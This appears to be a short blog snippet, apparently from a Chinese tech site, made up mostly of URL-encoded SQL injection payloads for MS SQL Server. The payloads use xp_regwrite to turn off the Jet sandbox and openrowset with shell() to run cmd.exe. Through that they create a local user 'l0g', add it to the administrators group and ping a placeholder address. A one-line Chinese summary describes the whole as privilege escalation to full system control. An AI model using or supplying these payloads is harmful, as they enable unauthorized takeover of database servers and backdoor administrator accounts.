;exec%20master..xp_regwrite%20'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',0;--
%20and%200<>(select%20*%20from%20openrowset('microsoft.jet.oledb.4.0',';database=c:/winnt/system32/ias/dnary.mdb','select%20shell("cmd.exe%20/c%20net%20user%20l0g%20l0g%20/add")'))
%20and%200<>(select%20*%20from%20openrowset('microsoft.jet.oledb.4.0',';database=c:/winnt/system32/ias/dnary.mdb','select%20shell("cmd.exe%20/c%20net%20localgroup%20administrators%20l0g%20/add")'))
net%20localgroup%20administrators%20l0g%20/add
%20and%200<>(select%20*%20from%20openrowset('microsoft.jet.oledb.4.0',';database=c:/winnt/system32/ias/dnary.mdb','select%20shell("cmd.exe%20/c%20ping xxx.xxx.xxx.xxx")'))
本文展示了一种利用SQL注入漏洞进行权限提升的方法,通过特定的SQL语句修改注册表设置,并利用OLE DB连接执行系统命令创建新用户并将其加入管理员组,最终实现对系统的完全控制。

7005

被折叠的 条评论
为什么被折叠?



